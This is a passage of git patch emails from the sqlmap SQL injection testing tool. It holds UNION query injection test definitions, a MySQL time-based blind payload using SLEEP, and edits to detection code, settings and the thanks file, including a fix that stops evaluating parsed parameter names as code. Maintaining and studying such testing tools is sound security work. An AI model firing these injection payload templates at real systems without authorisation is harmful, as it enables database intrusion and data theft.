+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>21-30</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>31-40</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+    <test>
+        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
+        <stype>6</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>41-50</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
     <test>
         <title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
         <stype>6</stype>
@@ -397,346 +738,5 @@
             <dbms>MySQL</dbms>
         </details>
     </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
-        <stype>6</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>[COLSTART]-[COLSTOP]</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
-        <stype>6</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>1-10</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
-        <stype>6</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
-        <stype>6</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
-        <stype>6</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>11-20</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
-        <stype>6</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
-        <stype>6</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
-        <stype>6</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>21-30</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
-        <stype>6</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
-        <stype>6</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
-        <stype>6</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>31-40</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
-        <stype>6</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[CHAR]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-    <test>
-        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
-        <stype>6</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>NULL</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
-
-    <test>
-        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
-        <stype>6</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>[UNION]</vector>
-        <request>
-            <payload/>
-            <comment>-- </comment>
-            <char>[RANDNUM]</char>
-            <columns>41-50</columns>
-        </request>
-        <response>
-            <union/>
-        </response>
-    </test>
     <!-- End of UNION query tests -->
 </root>

From 388c0dfd77e6bea8332df33ed238a2ee88e493c9 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 12:57:49 +0000
Subject: [PATCH 361/492] trivial layout fix

---
 lib/core/settings.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 302bc9bb7..b430695f2 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -145,10 +145,10 @@ INFERENCE_EQUALS_CHAR = "="
 # Character used for operation "not-equals" in inference
 INFERENCE_NOT_EQUALS_CHAR = "!="
 
-# String used for representation of unknown dbms
+# String used for representation of unknown DBMS
 UNKNOWN_DBMS = "Unknown"
 
-# String used for representation of unknown dbms version
+# String used for representation of unknown DBMS version
 UNKNOWN_DBMS_VERSION = "Unknown"
 
 # Dynamicity mark length used in dynamicity removal engine

From 8be24d3e9b699e7d6fdb8c8dc6814bfab4952e37 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 12:59:27 +0000
Subject: [PATCH 362/492] minor enhancement, prefer intersect() each time DBMS
 values are comfronted

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 5b9ea7afd..6d9b7c020 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2823,7 +2823,7 @@ def getSortedInjectionTests():
             retVal = SORT_ORDER.LAST
 
         elif 'details' in test and 'dbms' in test.details:
-            if test.details.dbms in Backend.getErrorParsedDBMSes():
+            if intersect(test.details.dbms, Backend.getErrorParsedDBMSes()):
                 retVal = SORT_ORDER.SECOND
             else:
                 retVal = SORT_ORDER.THIRD

From d235ee375b589585c6b350400e41c62641c01829 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 12:59:44 +0000
Subject: [PATCH 363/492] code cleanup

---
 lib/controller/checks.py | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index caec3152e..ceb7f5963 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -65,7 +65,6 @@ from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
 from lib.core.settings import SUPPORTED_DBMS
-from lib.core.settings import UNKNOWN_DBMS
 from lib.core.settings import URI_HTTP_HEADER
 from lib.core.settings import LOWER_RATIO_BOUND
 from lib.core.settings import UPPER_RATIO_BOUND
@@ -125,8 +124,8 @@ def checkSqlInjection(place, parameter, value):
             if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
                and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
                kb.heuristicDbms or injection.dbms):
-                msg = "do you want to include all tests for '%s' " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
-                msg += "extending provided "
+                msg = "for the remaining tests, do you want to include all tests "
+                msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
                 msg += "level (%d)" % conf.level if conf.level < 5 else ""
                 msg += " and " if conf.level < 5 and conf.risk < 3 else ""
                 msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
@@ -436,6 +435,7 @@ def checkSqlInjection(place, parameter, value):
                                 trueSet = set(extractTextTagContent(truePage))
                                 falseSet = set(extractTextTagContent(falsePage))
                                 candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
+
                                 if candidates:
                                     conf.string = candidates[0]
                                     infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
@@ -509,8 +509,8 @@ def checkSqlInjection(place, parameter, value):
                                     Backend.forceDbms(kb.heuristicDbms)
 
                             if unionExtended:
-                                infoMsg = "automatically extending ranges "
-                                infoMsg += "for UNION query injection technique tests as "
+                                infoMsg = "automatically extending ranges for UNION "
+                                infoMsg += "query injection technique tests as "
                                 infoMsg += "there is at least one other (potential) "
                                 infoMsg += "technique found"
                                 singleTimeLogMessage(infoMsg)
@@ -555,12 +555,15 @@ def checkSqlInjection(place, parameter, value):
                             for dKey, dValue in test.details.items():
                                 if dKey == "dbms":
                                     injection.dbms = dValue
+
                                     if not isinstance(dValue, list):
                                         Backend.setDbms(dValue)
                                     else:
                                         Backend.forceDbms(dValue[0], True)
+
                                 elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter:
                                     injection.dbms_version = Backend.setVersion(dValue)
+
                                 elif dKey == "os" and injection.os is None:
                                     injection.os = Backend.setOs(dValue)
 
@@ -806,14 +809,12 @@ def checkFilteredChars(injection):
 
 def heuristicCheckSqlInjection(place, parameter):
     if kb.nullConnection:
-        debugMsg = "heuristic check skipped "
-        debugMsg += "because NULL connection used"
+        debugMsg = "heuristic check skipped because NULL connection used"
         logger.debug(debugMsg)
         return None
 
     if wasLastResponseDBMSError():
-        debugMsg = "heuristic check skipped "
-        debugMsg += "because original page content "
+        debugMsg = "heuristic check skipped because original page content "
         debugMsg += "contains DBMS error"
         logger.debug(debugMsg)
         return None

From 383929c0c2b9008d9eaca3ed797b440e2f4519da Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 13:12:03 +0000
Subject: [PATCH 364/492] if the user forces the DBMS, then sort the tests
 accordingly to perform first the DBMS-specific tests, then the others

---
 lib/core/common.py | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 6d9b7c020..9c06dec09 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -438,10 +438,9 @@ class Backend:
 
         This functions is called to:
 
-        1. Sort the tests, getSortedInjectionTests() - detection phase.
-        2. Ask user whether or not skip specific DBMS tests in detection phase,
+        1. Ask user whether or not skip specific DBMS tests in detection phase,
            lib/controller/checks.py - detection phase.
-        3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
+        2. Sort the fingerprint of the DBMS, lib/controller/handler.py -
            fingerprint phase.
         """
 
@@ -449,6 +448,13 @@ class Backend:
 
     @staticmethod
     def getIdentifiedDbms():
+        """
+        This functions is called to:
+
+        1. Sort the tests, getSortedInjectionTests() - detection phase.
+        2. Etc.
+        """
+
         dbms = None
 
         if not kb:
@@ -2823,14 +2829,14 @@ def getSortedInjectionTests():
             retVal = SORT_ORDER.LAST
 
         elif 'details' in test and 'dbms' in test.details:
-            if intersect(test.details.dbms, Backend.getErrorParsedDBMSes()):
+            if intersect(test.details.dbms, Backend.getIdentifiedDbms()):
                 retVal = SORT_ORDER.SECOND
             else:
                 retVal = SORT_ORDER.THIRD
 
         return retVal
 
-    if Backend.getErrorParsedDBMSes():
+    if Backend.getIdentifiedDbms():
         retVal = sorted(retVal, key=priorityFunction)
 
     return retVal

From 475cc8b24bdc1378d1fb08ff4873afffbb4789e2 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 13:12:30 +0000
Subject: [PATCH 365/492] trivial code cleanup

---
 lib/controller/checks.py | 4 ++--
 lib/core/common.py       | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index ceb7f5963..8ee3ce45c 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -277,8 +277,8 @@ def checkSqlInjection(place, parameter, value):
             infoMsg = "testing '%s'" % title
             logger.info(infoMsg)
 
-            # Force back-end DBMS according to the current
-            # test value for proper payload unescaping
+            # Force back-end DBMS according to the current test DBMS value
+            # for proper payload unescaping
             Backend.forceDbms(dbms[0] if isinstance(dbms, list) else dbms)
 
             # Parse test's <request>
diff --git a/lib/core/common.py b/lib/core/common.py
index 9c06dec09..adba9fdbe 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -462,9 +462,9 @@ class Backend:
         elif Backend.getForcedDbms() is not None:
             dbms = Backend.getForcedDbms()
         elif Backend.getDbms() is not None:
-            dbms = kb.dbms
+            dbms = Backend.getDbms()
         elif conf.get("dbms"):
-            dbms = conf.dbms
+            dbms = conf.get("dbms")
         elif Backend.getErrorParsedDBMSes():
             dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
         elif kb.get("injection") and kb.injection.dbms:

From e35c7fbb7a6fed243805ec98f4c915ae0d6aa541 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 22 Feb 2015 13:41:54 +0100
Subject: [PATCH 366/492] Fixes #1172

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index b430695f2..22bd1ec27 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -495,7 +495,7 @@ HASHDB_FLUSH_RETRIES = 3
 HASHDB_END_TRANSACTION_RETRIES = 3
 
 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "nXkbwIURlN"  # rd74b803 "".join(random.sample(string.ascii_letters, 10))
+HASHDB_MILESTONE_VALUE = "JHjrBugdDA"  # "".join(random.sample(string.ascii_letters, 10))
 
 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2

From 6bcc95a20d41beb3535d3724dd012cdf5b40a575 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 24 Feb 2015 15:05:44 +0100
Subject: [PATCH 367/492] Restricting evaluated code variable names to Python
 valid characters ([_0-9a-zA-Z])

---
 lib/request/connect.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index ef7cd40fe..b0427b18b 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -848,7 +848,7 @@ class Connect(object):
                 for part in item.split(delimiter):
                     if '=' in part:
                         name, value = part.split('=', 1)
-                        name = name.strip()
+                        name = re.sub(r"[^\w]", "", name.strip())
                         if name in keywords:
                             name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
@@ -858,7 +858,7 @@ class Connect(object):
                 for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
                     if '=' in part:
                         name, value = part.split('=', 1)
-                        name = name.strip()
+                        name = re.sub(r"[^\w]", "", name.strip())
                         if name in keywords:
                             name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True)

From b74edf9664101a08a1120c622ab6d5b0d6e37039 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 25 Feb 2015 10:16:01 +0100
Subject: [PATCH 368/492] Fixes #1175

---
 xml/payloads/05_time_blind.xml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index 76a060a13..2cec7931e 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -1036,15 +1036,15 @@
     </test>
 
     <test>
-        <title>MySQL time-based blind - Parameter replace (bool*int)</title>
+        <title>MySQL time-based blind - Parameter replace (bool)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>3</where>
-        <vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
+        <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
         <request>
-            <payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
+            <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>

From dde400ab8fa273e2a841dfda8a24bd860b6830e6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 25 Feb 2015 10:19:51 +0100
Subject: [PATCH 369/492] More suitable version of 6bcc95a (suggested by user)

---
 lib/request/connect.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index b0427b18b..82e7290f9 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -852,7 +852,7 @@ class Connect(object):
                         if name in keywords:
                             name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
-                        evaluateCode("%s=%s" % (name, repr(value)), variables)
+                        variables[name] = value
 
             if cookie:
                 for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
@@ -862,7 +862,7 @@ class Connect(object):
                         if name in keywords:
                             name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True)
-                        evaluateCode("%s=%s" % (name, repr(value)), variables)
+                        variables[name] = value
 
             while True:
                 try:

From 33429f443c38940b913ffac162b26d6396e0a956 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 25 Feb 2015 10:31:27 +0100
Subject: [PATCH 370/492] Minor update

---
 doc/THANKS.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/THANKS.md b/doc/THANKS.md
index 216257cf9..b80d2c81b 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -154,7 +154,7 @@ Jose Fonseca, <jose.r.fonseca(at)gmail.com>
     http://code.google.com/p/jrfonseca/wiki/XDot
 
 Alan Franzoni, <alan.franzoni(at)gmail.com>
-* for helping me out with Python subprocess library
+* for helping out with Python subprocess library
 
 Harold Fry, <harold(at)violaceo.us>
 * for suggesting a minor enhancement
@@ -275,7 +275,7 @@ Guido Landi, <lists(at)keamera.org>
 * for reporting a couple of bugs
 * for the great technical discussions
 * for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
-* for presenting with me at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
+* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
 
 Lee Lawson, <Lee.Lawson(at)dns.co.uk>
 * for reporting a minor bug
@@ -369,7 +369,7 @@ Yonny Mutai, <yonnym(at)googlemail.com>
 * for reporting a minor bug
 
 Roberto Nemirovsky, <roberto.paes(at)gmail.com>
-* for pointing me out some enhancements
+* for pointing out some enhancements
 
 Simone Onofri, <simone.onofri(at)gmail.com>
 * for patching the PHP web backdoor to make it work properly also on Windows
@@ -425,7 +425,7 @@ Ole Rasmussen, <olerass(at)gmail.com>
 * for suggesting a feature
 
 Alberto Revelli, <r00t(at)northernfortress.net>
-* for inspiring me to write sqlmap user's manual in SGML
+* for inspiring to write sqlmap user's manual in SGML
 * for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
 
 David Rhoades, <david.rhoades(at)mavensecurity.com>
@@ -556,7 +556,7 @@ Kazim Bugra Tombul, <mhackmail(at)gmail.com>
 * for reporting a minor bug
 
 Efrain Torres, <et(at)metasploit.com>
-* for helping me out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
+* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
 * for his great Metasploit WMAP Framework
 
 Sandro Tosi, <matrixhasu(at)gmail.com>

From ee11292f879e609d5144f1b6c7e5f4b2c875e28e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 25 Feb 2015 10:33:54 +0100
Subject: [PATCH 371/492] Update of doc/THANKS

---
 doc/THANKS.md | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/doc/THANKS.md b/doc/THANKS.md
index b80d2c81b..6af144cd5 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -371,6 +371,9 @@ Yonny Mutai, <yonnym(at)googlemail.com>
 Roberto Nemirovsky, <roberto.paes(at)gmail.com>
 * for pointing out some enhancements
 
+Sebastian Nerz, <sebastian.nerz(at)syss.de>
+* for reporting a (potential) vulnerability in --eval
+
 Simone Onofri, <simone.onofri(at)gmail.com>
 * for patching the PHP web backdoor to make it work properly also on Windows
 

From 2f08c8b6663aa1a3f86dd0fd8002a437bf5cd79c Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 27 Feb 2015 13:57:28 +0000
Subject: [PATCH 372/492] bug fix: do not skil heuristic check if previous page
 (test for dynamicity) had DBMS message. Code cleanup

---
 lib/controller/checks.py | 68 +++++++++++++++++++---------------------
 1 file changed, 32 insertions(+), 36 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 8ee3ce45c..14aef2610 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -117,8 +117,8 @@ def checkSqlInjection(place, parameter, value):
                     msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
                     kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
-            # If the DBMS has already been fingerprinted (via DBMS-specific
-            # error message, via simple heuristic check or via DBMS-specific
+            # If the DBMS has been fingerprinted (via DBMS-specific error
+            # message, via simple heuristic check or via DBMS-specific
             # payload), ask the user to extend the tests to all DBMS-specific,
             # regardless of --level and --risk values provided
             if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
@@ -190,54 +190,57 @@ def checkSqlInjection(place, parameter, value):
                 logger.debug(debugMsg)
                 continue
 
+            # Parse DBMS-specific payloads' details
